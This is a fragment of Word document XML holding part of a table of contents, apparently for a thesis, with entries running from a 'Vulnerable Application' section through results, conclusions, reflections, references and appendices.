            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Vulnerable Application</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859299 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D35AFB2" w14:textId="76AD3330" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859300"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_Toc86859300 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FA21B61" w14:textId="22289C3E" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859301" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 7</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> - RESULTS AND DISCUSSIONS</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859301 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2901184E" w14:textId="66B997D0" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859302"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_Toc86859302 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A0E276D" w14:textId="768531C0" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859303" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1 RESULTS</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859303 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C0B582F" w14:textId="531D7383" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859304" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2 DISCUSSIONS</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859304 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A43103D" w14:textId="1E316459" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859305" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SUMMARY</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859305 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59D2D617" w14:textId="436DD8F0" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859306" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 8</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> - CONCLUSIONS AND RECOMMENDATIONS</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859306 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="086C19B5" w14:textId="793174A2" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859307" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859307 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3622F711" w14:textId="29E22A1F" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859308" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1 SUMMARY</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859308 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="766D177F" w14:textId="572D2439" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859309" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2 CONCLUSION</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859309 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="522B588C" w14:textId="3847E152" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859310" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3 RECOMMENDATIONS FOR FURTHER RESEARCH</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859310 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63F0E4F9" w14:textId="1AC536D9" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859311" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 9</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> – REFLECTIONS</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859311 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B8D16CD" w14:textId="2E5F384F" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859312" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 10</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> REFERENCES</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859312 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EB070FD" w14:textId="161C007C" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859313" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPENDICES</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859313 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
